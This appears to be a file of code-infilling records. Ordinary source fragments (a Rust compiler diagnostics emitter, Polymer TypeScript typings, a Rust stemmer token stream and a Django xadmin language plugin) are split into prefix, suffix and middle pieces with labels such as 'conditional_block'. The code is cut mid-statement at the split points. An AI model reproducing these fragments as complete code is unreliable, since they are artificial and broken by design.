self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() |
Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
M: FnOnce() -> String,
{
match opt {
Some(t) => t,
None => diag.handler().bug(&msg()),
}
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
}
| {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len()));
} | conditional_block |
index.d.ts | // Generated by typings
// Source: https://raw.githubusercontent.com/DefinitelyTyped/DefinitelyTyped/a872802c0c84ba98ff207d5e673a1fa867c67fd6/polymer/polymer.d.ts
declare namespace polymer {
type PropConstructorType = StringConstructor|ObjectConstructor|BooleanConstructor|NumberConstructor|DateConstructor|ArrayConstructor;
interface PropObjectType {
type: PropConstructorType;
value?: boolean | number | string | Function | Object;
reflectToAttribute?: boolean;
readOnly?: boolean;
notify?: boolean;
computed?: string;
observer?: string;
}
interface Base {
/** Need to allow all properties for callback methods. */
[prop: string]: any;
/* polymer-micro */
// Attributes
hostAttributes?: {[name:string]:any};
reflectPropertiesToAttribute?(name: string): void;
serializeValueToAttribute?(value: any, attribute: string, node?: Element): void;
deserialize?(value: string, type: NumberConstructor): number;
deserialize?(value: string, type: BooleanConstructor): boolean;
deserialize?(value: string, type: ObjectConstructor): Object;
deserialize?(value: string, type: ArrayConstructor): any[];
deserialize?(value: string, type: DateConstructor): Date;
deserialize?(value: string, type: StringConstructor): string;
serialize?(value: any): string;
// Behaviors
behaviors?:Object[];
// Constructors
factoryImpl?(...args: any[]): void;
// Debouncer
debounce?(jobName: string, callback: Function, wait: number): void;
isDebouncerActive?(jobName: string): boolean;
flushDebouncer?(jobName: string): void;
cancelDebouncer?(jobName: string): void;
// Extends
extends?: string;
getNativePrototype?(tag: string): Object;
// Properties
properties?:{[prop:string]:(PropConstructorType|PropObjectType);};
getPropertyInfo?(property: string): Object;
// Tag
is: string;
/* polymer-mini */
// Ready
ready?(): void;
attachedCallback?(): void;
// Shady
domHost?(): Element;
distributeContent?(): void;
elementMatches?(selector: string, node?: Element): boolean;
// Template {
instanceTemplate?(template: HTMLElement): DocumentFragment;
/* polymer-standard */
// Annotations
$?: any;
// Events
listeners?: {[key:string]:string;};
listen?(node: Element, eventName: string, methodName: string): void;
unlisten?(node: Element, eventName: string, methodName: string): void;
// Gestures
setScrollDirection?(direction: string, node?: HTMLElement): void;
// NotifyPath
notifyPath?(path: string, value: any, fromAbove: any): void;
set?(path: string|(string|number)[], value: any, root?: Object): void;
get?(path: string|(string|number)[], root?: Object): any;
linkPaths?(to: string, from?: string): void;
unlinkPaths?(path: string): void;
push?(path: string, ...item: any[]): number;
pop?(path: string): any;
splice?(path: string, index: number, removeCount: number, ...item: any[]):
number;
shift?(path: string): any;
unshift?(path: string, ...item: any[]): number;
// ResolveUrl
resolveUrl?(url: string): string;
// Styling
scopeSubtree?(container: Element, shouldObserve: boolean): void;
// Utils
$$?(selector: string): Element;
toggleClass?(name: string, bool?: boolean, node?: HTMLElement): void;
toggleAttribute?(name: string, bool?: boolean, node?: HTMLElement): void;
classFollows?(name: string, toElement: HTMLElement, fromElement: HTMLElement): void;
attributeFollows?(name: string, toElement: HTMLElement, fromElement: HTMLElement): void;
getContentChildNodes?(selector: string): Node[];
getContentChildren?(selector: string): HTMLElement[];
fire?(type: string, detail?: any, options?: Object): CustomEvent;
async?(callback: ()=>void, waitTime?: number): number;
cancelAsync?(handle: number): void;
arrayDelete?(path: string|any[], item: any): any[];
transform?(transform: string, node?: HTMLElement): void;
translate3d?(x: number, y: number, z: number, node?: HTMLElement): void;
importHref?(href: string, onload?: Function, onerror?: Function): HTMLLinkElement;
create?(tag: string, props: Object): Element;
isLightDescendant?(node: HTMLElement): boolean;
isLocalDescendant?(node: HTMLElement): boolean
// XStyling
updateStyles?(): void;
/* common api */
registerCallback?():void;
createdCallback?():void;
attachedCallback?():void;
detachedCallback?():void;
attributeChangedCallback?(name: string):void;
extend?(prototype: Object, api: Object):Object;
mixin?(target: Object, source: Object):Object;
copyOwnProperty?(name: string, source: Object, target: Object):void;
observers?: string[];
beforeRegister?(): void;
registered?(): void;
created?(): void;
attached?(): void;
detached?(): void;
attributeChanged?(name: string, oldValue: any, newValue: any): void;
}
interface DomApiStatic {
(obj: Node|Base):DomApi;
(obj: Event):EventApi;
flush():void;
}
interface DomApi {
appendChild(node: Node): Node;
insertBefore(node: Node, refNode?: Node):Node;
removeChild(node: Node):Node;
replaceChild(node: Node, refNode: Node):Node;
getOwnerRoot():Node;
querySelector(selector: string):Node;
querySelectorAll(selector: string):Node[];
getDestinationInsertionPoints():Node[];
getDistributedNodes():Node[];
queryDistributedElements(selector: string):Node[];
setAttribute(name: string, value: any):void;
removeAttribute(name: string):void;
| childNodes:Node[];
children:Element[];
parentNode:Node;
firstChild:Node;
lastChild:Node;
nextSibling:Node;
previousSibling:Node;
firstElementChild:Element;
lastElementChild:Element;
nextElementSibling:Element;
previousElementSibling:Element;
textContent:string;
innerHTML:string;
}
interface EventApi {
rootTarget:EventTarget;
localTarget:EventTarget;
path:Node[];
}
interface Settings {
wantShadow:boolean;
hasShadow:boolean;
nativeShadow:boolean;
useShadow:boolean;
useNativeShadow:boolean;
useNativeImports:boolean;
useNativeCustomElements:boolean;
}
interface PolymerStatic {
Settings: Settings;
dom:DomApiStatic;
(prototype: Base|{new ():Base}):webcomponents.CustomElementConstructor;
Class(prototype: Base|{new ():Base}):webcomponents.CustomElementConstructor;
}
}
declare var Polymer: polymer.PolymerStatic; | random_line_split |
|
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() |
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
} | conditional_block |
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
} | } | random_line_split |
|
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token |
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | {
self.tail.token()
} | identifier_body |
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct | <TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | StemmerTokenStream | identifier_name |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class | (BaseAdminView):
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')
| SetLangView | identifier_name |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
|
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')
| def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request) | identifier_body |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
def post(self, request, *args, **kwargs):
